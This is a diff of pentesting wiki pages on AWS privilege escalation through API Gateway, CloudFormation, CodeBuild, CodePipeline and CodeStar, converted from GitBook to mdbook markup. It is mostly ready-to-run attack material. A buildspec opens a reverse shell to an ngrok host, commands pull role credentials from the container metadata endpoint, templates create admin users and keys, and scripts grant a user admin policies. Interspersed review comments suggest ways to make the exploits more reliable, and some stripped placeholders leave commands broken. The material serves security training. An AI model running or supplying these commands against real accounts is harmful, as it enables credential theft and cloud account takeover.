@@ -80,19 +63,16 @@ aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` -{% endcode %} **Potential Impact**: Access to resources associated with the Lambda function's IAM role. ### `apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment` -{% hint style="info" %} -Need testing -{% endhint %} +> [!NOTE] +> Need testing An attacker with the permissions `apigateway:UpdateAuthorizer` and `apigateway:CreateDeployment` can **modify an existing API Gateway authorizer** to bypass security checks or to execute arbitrary code when API requests are made. -{% code overflow="wrap" %} ```bash API_ID="your-api-id" AUTHORIZER_ID="your-authorizer-id" @@ -104,15 +84,13 @@ aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZ # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` -{% endcode %} **Potential Impact**: Bypassing security checks, unauthorized access to API resources. ### `apigateway:UpdateVpcLink` -{% hint style="info" %} -Need testing -{% endhint %} +> [!NOTE] +> Need testing An attacker with the permission `apigateway:UpdateVpcLink` can **modify an existing VPC Link to point to a different Network Load Balancer, potentially redirecting private API traffic to unauthorized or malicious resources**. @@ -126,17 +104,4 @@ aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op= **Potential Impact**: Unauthorized access to private API resources, interception or disruption of API traffic. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md
new file mode 100644
index 000000000..f4e2282e8
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md
@@ -0,0 +1,9 @@
+# AWS - Chime Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+### chime:CreateApiKey
+
+TODO
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
similarity index 59%
rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
index f81096943..d205cf1ad 100644
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
@@ -1,27 +1,14 @@
 # AWS - Cloudformation Privesc
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## cloudformation For more information about cloudformation check: -{% content-ref url="../../aws-services/aws-cloudformation-and-codestar-enum.md" %} -[aws-cloudformation-and-codestar-enum.md](../../aws-services/aws-cloudformation-and-codestar-enum.md) -{% endcontent-ref %} +{{#ref}} +../../aws-services/aws-cloudformation-and-codestar-enum.md +{{#endref}} ### `iam:PassRole`, `cloudformation:CreateStack` @@ -35,9 +22,9 @@ aws cloudformation create-stack --stack-name \ In the following page you have an **exploitation example** with the additional permission **`cloudformation:DescribeStacks`**: -{% content-ref url="iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md" %} -[iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md](iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md) -{% endcontent-ref %} +{{#ref}} +iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md +{{#endref}} **Potential Impact:** Privesc to the cloudformation service role specified. @@ -51,7 +38,7 @@ aws cloudformation update-stack \ --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ --role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \ --capabilities CAPABILITY_IAM \ - --region eu-west-1 + --region eu-west-1 ``` The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack. 
@@ -126,19 +113,6 @@ An attacker could abuse this permission without the passRole permission to updat
 ## References
-* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
new file mode 100644
index 000000000..47f709078
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
@@ -0,0 +1,81 @@
+# iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+An attacker could for example use a **cloudformation template** that generates **keys for an admin** user like:
+
+```json
+{
+ "Resources": {
+ "AdminUser": {
+ "Type": "AWS::IAM::User"
+ },
+ "AdminPolicy": {
+ "Type": "AWS::IAM::ManagedPolicy",
+ "Properties": {
+ "Description": "This policy allows all actions on all resources.",
+ "PolicyDocument": {
+ "Version": "2012-10-17",
+ "Statement": [
+ {
+ "Effect": "Allow",
+ "Action": ["*"],
+ "Resource": "*"
+ }
+ ]
+ },
+ "Users": [
+ {
+ "Ref": "AdminUser"
+ }
+ ]
+ }
+ },
+ "MyUserKeys": {
+ "Type": "AWS::IAM::AccessKey",
+ "Properties": {
+ "UserName": {
+ "Ref": "AdminUser"
+ }
+ }
+ }
+ },
+ "Outputs": {
+ "AccessKey": {
+ "Value": {
+ "Ref": "MyUserKeys"
+ },
+ "Description": "Access Key ID of Admin User"
+ },
+ "SecretKey": {
+ "Value": {
+ "Fn::GetAtt": ["MyUserKeys", "SecretAccessKey"]
+ },
+ "Description": "Secret Key of Admin User"
+ }
+ }
+}
+```
+
+Then **generate the cloudformation stack**:
+
+```bash
+aws cloudformation create-stack --stack-name privesc \
+ --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
+ --role arn:aws:iam::[REDACTED]:role/adminaccess \
+ --capabilities CAPABILITY_IAM --region us-west-2
+```
+
+**Wait for a couple of minutes** for the stack to be generated and then **get the output** of the stack where the **credentials are stored**:
+
+```bash
+aws cloudformation describe-stacks \
+ --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
+ --region uswest-2
+```
+
+### References
+
+- [https://bishopfox.com/blog/privilege-escalation-in-aws](https://bishopfox.com/blog/privilege-escalation-in-aws)
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
similarity index 70%
rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
index 043bba875..b84aa8b1f 100644
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
@@ -1,35 +1,22 @@
 # AWS - Codebuild Privesc
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## codebuild Get more info in: -{% content-ref url="../aws-services/aws-codebuild-enum.md" %} -[aws-codebuild-enum.md](../aws-services/aws-codebuild-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-codebuild-enum.md +{{#endref}} ### `codebuild:StartBuild` | `codebuild:StartBuildBatch` Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project: -{% tabs %} -{% tab title="StartBuild" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="StartBuild" }} + ```bash cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml ``` -{% endcode %} -{% endtab %} -{% tab title="StartBuildBatch" %} -{% code overflow="wrap" %} +{{#endtab }} + +{{#tab name="StartBuildBatch" }} + ```bash cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} **Note**: The difference between these two commands is that: -* `StartBuild` triggers a single build job using a specific `buildspec.yml`. -* `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel). +- `StartBuild` triggers a single build job using a specific `buildspec.yml`. +- `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel). **Potential Impact:** Direct privesc to attached AWS Codebuild roles. 
@@ -86,8 +73,9 @@ aws codebuild start-build-batch --project --buildspec-override fi An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one. -{% tabs %} -{% tab title="Example1" %} +{{#tabs }} +{{#tab name="Example1" }} + ```bash # Enumerate then env and get creds REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" @@ -129,10 +117,11 @@ aws codebuild start-build --project-name codebuild-demo-project # Delete the project aws codebuild delete-project --name codebuild-demo-project ``` -{% endtab %} -{% tab title="Example2" %} -{% code overflow="wrap" %} +{{#endtab }} + +{{#tab name="Example2" }} + ```bash # Generated by AI, not tested # Create a buildspec.yml file with reverse shell command 
@@ -152,21 +141,20 @@ aws codebuild create-project --name reverse-shell-project --source type=S3,locat aws codebuild start-build --project-name reverse-shell-project ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} **Potential Impact:** Direct privesc to any AWS Codebuild role. -{% hint style="warning" %} -In a **Codebuild container** the file `/codebuild/output/tmp/env.sh` contains all the env vars needed to access the **metadata credentials**. +> [!WARNING] +> In a **Codebuild container** the file `/codebuild/output/tmp/env.sh` contains all the env vars needed to access the **metadata credentials**. -This file contains the **env variable `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** which contains the **URL path** to access the credentials. It will be something like this `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420` +> This file contains the **env variable `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** which contains the **URL path** to access the credentials. It will be something like this `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420` -Add that to the URL **`http://169.254.170.2/`** and you will be able to dump the role credentials. +> Add that to the URL **`http://169.254.170.2/`** and you will be able to dump the role credentials. -Moreover, it also contains the **env variable `ECS_CONTAINER_METADATA_URI`** which contains the complete URL to get **metadata info about the container**. -{% endhint %} +> Moreover, it also contains the **env variable `ECS_CONTAINER_METADATA_URI`** which contains the complete URL to get **metadata info about the container**. ### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) 
@@ -212,9 +200,9 @@ aws codebuild start-build --project-name codebuild-demo-project Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**. -{% tabs %} -{% tab title="StartBuild" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="StartBuild" }} + ```sh REV_PATH="/tmp/codebuild_pwn.json" @@ -249,11 +237,11 @@ aws codebuild update-project --cli-input-json file://$REV_PATH aws codebuild start-build --project-name codebuild-demo-project ``` -{% endcode %} -{% endtab %} -{% tab title="StartBuildBatch" %} -{% code overflow="wrap" %} +{{#endtab }} + +{{#tab name="StartBuildBatch" }} + ```sh REV_PATH="/tmp/codebuild_pwn.json" @@ -286,9 +274,9 @@ aws codebuild update-project --cli-input-json file://$REV_PATH aws codebuild start-build-batch --project-name codebuild-demo-project ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} **Potential Impact:** Direct privesc to attached AWS Codebuild roles. @@ -324,7 +312,7 @@ Note: the escalation is relevant only if the CodeBuild worker has a different ro ```bash aws s3 cp s3:///buildspec.yml ./ -vim ./buildspec.yml +vim ./buildspec.yml # Add the following lines in the "phases > pre_builds > commands" section # @@ -340,8 +328,7 @@ aws codebuild start-build --project-name You can use something like this **buildspec** to get a **reverse shell**: -{% code title="buildspec.yml" %} -```yaml +```yaml:buildspec.yml version: 0.2 phases: 
@@ -349,29 +336,14 @@ phases: commands: - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1 ``` -{% endcode %} **Impact:** Direct privesc to the role used by the AWS CodeBuild worker that usually has high privileges. -{% hint style="warning" %} -Note that the buildspec could be expected in zip format, so an attacker would need to download, unzip, modify the `buildspec.yml` from the root directory, zip again and upload -{% endhint %} +> [!WARNING] +> Note that the buildspec could be expected in zip format, so an attacker would need to download, unzip, modify the `buildspec.yml` from the root directory, zip again and upload More details could be found [here](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/). **Potential Impact:** Direct privesc to attached AWS Codebuild roles. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md new file mode 100644 index 000000000..884bb7fa3 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md 
@@ -0,0 +1,37 @@ +# AWS - Codepipeline Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## codepipeline + +For more info about codepipeline check: + +{{#ref}} +../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md +{{#endref}} + +### `iam:PassRole`, `codepipeline:CreatePipeline`, `codebuild:CreateProject, codepipeline:StartPipelineExecution` + +When creating a code pipeline you can indicate a **codepipeline IAM Role to run**, therefore you could compromise them. + +Apart from the previous permissions you would need **access to the place where the code is stored** (S3, ECR, github, bitbucket...) + +I tested this doing the process in the web page, the permissions indicated previously are the not List/Get ones needed to create a codepipeline, but for creating it in the web you will also need: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:` + +During the **creation of the build project** you can indicate a **command to run** (rev shell?) and to run the build phase as **privileged user**, that's the configuration the attacker needs to compromise: + +![](<../../../images/image (276).png>) + +![](<../../../images/image (181).png>) + +### ?`codebuild:UpdateProject, codepipeline:UpdatePipeline, codepipeline:StartPipelineExecution` + +It might be possible to modify the role used and the command executed on a codepipeline with the previous permissions. + +### `codepipeline:pollforjobs` + +[AWS mentions](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html): + +> When this API is called, CodePipeline **returns temporary credentials for the S3 bucket** used to store artifacts for the pipeline, if the action requires access to that S3 bucket for input or output artifacts. 
This API also **returns any secret values defined for the action**. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md new file mode 100644 index 000000000..9dd00b43d --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md 
@@ -0,0 +1,73 @@ +# AWS - Codestar Privesc + +{{#include ../../../../banners/hacktricks-training.md}} + +## Codestar + +You can find more information about codestar in: + +{{#ref}} +codestar-createproject-codestar-associateteammember.md +{{#endref}} + +### `iam:PassRole`, `codestar:CreateProject` + +With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. Check the following page: + +{{#ref}} +iam-passrole-codestar-createproject.md +{{#endref}} + +### `codestar:CreateProject`, `codestar:AssociateTeamMember` + +This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**. + +```bash +PROJECT_NAME="supercodestar" + +aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \ + --name $PROJECT_NAME \ + --id $PROJECT_NAME + +echo "Waiting 1min to start the project" +sleep 60 + +USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"') + +aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \ + --project-id $PROJECT_NAME \ + --user-arn "$USER_ARN" \ + --project-role "Owner" \ + --remote-access-allowed +``` + +If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember` + +**Potential Impact:** Privesc to the codestar policy generated. You can find an example of that policy in: + +{{#ref}} +codestar-createproject-codestar-associateteammember.md +{{#endref}} + +### `codestar:CreateProjectFromTemplate` + +1. **Create a New Project:** + - Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project. 
+ - Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**. + - This access specifically targets a stack associated with the `CodeStarWorker--CloudFormation` IAM role. +2. **Update the Target Stack:** + - With the granted CloudFormation permissions, proceed to update the specified stack. + - The stack's name will typically conform to one of two patterns: + - `awscodestar--infrastructure` + - `awscodestar--lambda` + - The exact name depends on the chosen template (referencing the example exploit script). +3. **Access and Permissions:** + - Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack. + - Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further. + +For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\ +You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py) + +**Potential Impact:** Privesc to cloudformation IAM role. + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md new file mode 100644 index 000000000..7f900c00f --- /dev/null 
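Review bot: The placeholders in the `codestar:CreateProjectFromTemplate` steps were stripped, leaving `CodeStarWorker--CloudFormation`, `awscodestar--infrastructure` and `awscodestar--lambda` with a bare double hyphen where the project ID belongs; they should be written as `CodeStarWorker-<project-id>-CloudFormation` and `awscodestar-<project-id>-infrastructure` / `awscodestar-<project-id>-lambda` with the angle brackets escaped so mdbook does not drop them again. In the bash snippet, `opsworks describe-my-user-profile` is an indirect way to learn the caller's ARN and needs an OpsWorks permission the low-privileged profile may not have; `aws sts get-caller-identity --query Arn --output text` yields the same user ARN with no extra permission. The fixed `sleep 60` is a guess — polling `aws codestar describe-project --id $PROJECT_NAME` until its status shows the project is created would be more robust.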
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md 
@@ -0,0 +1,81 @@ +# codestar:CreateProject, codestar:AssociateTeamMember + +{{#include ../../../../banners/hacktricks-training.md}} + +This is the created policy the user can privesc to (the project name was `supercodestar`): + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "1", + "Effect": "Allow", + "Action": ["codestar:*", "iam:GetPolicy*", "iam:ListPolicyVersions"], + "Resource": [ + "arn:aws:codestar:eu-west-1:947247140022:project/supercodestar", + "arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent", + "arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner" + ] + }, + { + "Sid": "2", + "Effect": "Allow", + "Action": [ + "codestar:DescribeUserProfile", + "codestar:ListProjects", + "codestar:ListUserProfiles", + "codestar:VerifyServiceRole", + "cloud9:DescribeEnvironment*", + "cloud9:ValidateEnvironmentName", + "cloudwatch:DescribeAlarms", + "cloudwatch:GetMetricStatistics", + "cloudwatch:ListMetrics", + "codedeploy:BatchGet*", + "codedeploy:List*", + "codestar-connections:UseConnection", + "ec2:DescribeInstanceTypeOfferings", + "ec2:DescribeInternetGateways", + "ec2:DescribeNatGateways", + "ec2:DescribeRouteTables", + "ec2:DescribeSecurityGroups", + "ec2:DescribeSubnets", + "ec2:DescribeVpcs", + "events:ListRuleNamesByTarget", + "iam:GetAccountSummary", + "iam:GetUser", + "iam:ListAccountAliases", + "iam:ListRoles", + "iam:ListUsers", + "lambda:List*", + "sns:List*" + ], + "Resource": ["*"] + }, + { + "Sid": "3", + "Effect": "Allow", + "Action": [ + "codestar:*UserProfile", + "iam:GenerateCredentialReport", + "iam:GenerateServiceLastAccessedDetails", + "iam:CreateAccessKey", + "iam:UpdateAccessKey", + "iam:DeleteAccessKey", + "iam:UpdateSSHPublicKey", + "iam:UploadSSHPublicKey", + "iam:DeleteSSHPublicKey", + "iam:CreateServiceSpecificCredential", + "iam:UpdateServiceSpecificCredential", + "iam:DeleteServiceSpecificCredential", + "iam:ResetServiceSpecificCredential", + "iam:Get*", + "iam:List*" + ], + 
"Resource": ["arn:aws:iam::947247140022:user/${aws:username}"] + } + ] +} +``` + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md new file mode 100644 index 000000000..ab8af00d1 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md 
@@ -0,0 +1,88 @@ +# iam:PassRole, codestar:CreateProject + +{{#include ../../../../banners/hacktricks-training.md}} + +With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. + +To exploit this you need to create a **S3 bucket that is accessible** from the attacked account. Upload a file called `toolchain.json` . This file should contain the **cloudformation template exploit**. The following one can be used to set a managed policy to a user under your control and **give it admin permissions**: + +```json:toolchain.json +{ + "Resources": { + "supercodestar": { + "Type": "AWS::IAM::ManagedPolicy", + "Properties": { + "ManagedPolicyName": "CodeStar_supercodestar", + "PolicyDocument": { + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": "*", + "Resource": "*" + } + ] + }, + "Users": [""] + } + } + } +} +``` + +Also **upload** this `empty zip` file to the **bucket**: + +{% file src="../../../../images/empty.zip" %} + +Remember that the **bucket with both files must be accessible by the victim account**. 
+ +With both things uploaded you can now proceed to the **exploitation** creating a **codestar** project: + +```bash +PROJECT_NAME="supercodestar" + +# Crecte the source JSON +## In this JSON the bucket and key (path) to the empry.zip file is used +SOURCE_CODE_PATH="/tmp/surce_code.json" +SOURCE_CODE="[ + { + \"source\": { + \"s3\": { + \"bucketName\": \"privesc\", + \"bucketKey\": \"empty.zip\" + } + }, + \"destination\": { + \"codeCommit\": { + \"name\": \"$PROJECT_NAME\" + } + } + } +]" +printf "$SOURCE_CODE" > $SOURCE_CODE_PATH + +# Create the toolchain JSON +## In this JSON the bucket and key (path) to the toolchain.json file is used +TOOLCHAIN_PATH="/tmp/tool_chain.json" +TOOLCHAIN="{ + \"source\": { + \"s3\": { + \"bucketName\": \"privesc\", + \"bucketKey\": \"toolchain.json\" + } + }, + \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\" +}" +printf "$TOOLCHAIN" > $TOOLCHAIN_PATH + +# Create the codestar project that will use the cloudformation epxloit to privesc +aws codestar create-project \ + --name $PROJECT_NAME \ + --id $PROJECT_NAME \ + --source-code file://$SOURCE_CODE_PATH \ + --toolchain file://$TOOLCHAIN_PATH +``` + +This exploit is based on the **Pacu exploit of these privileges**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) On it you can find a variation to create an admin managed policy for a role instead of to a user. + +{{#include ../../../../banners/hacktricks-training.md}} 
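Review bot: The `"Users": [""]` entry in `toolchain.json` is a stripped placeholder — as written CloudFormation would attach the admin managed policy to nobody (or reject the empty name) — so it should read `"Users": ["<attacker-controlled-user>"]` with a sentence stating that this is an IAM user name, not an ARN. The `{% file src="../../../../images/empty.zip" %}` tag is GitBook syntax that mdbook renders literally; replace it with a plain link or, simpler, tell readers to create the file themselves with `python3 -c 'import zipfile; zipfile.ZipFile("empty.zip", "w").close()'`. The `roleArn` and the bucket name `privesc` are hard-coded to the author's account; `arn:aws:iam::<victim-account>:role/service-role/aws-codestar-service-role` and `<attacker-bucket>` would make clear which side owns each, and `printf '%s' "$SOURCE_CODE"` avoids treating the JSON as a printf format string.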
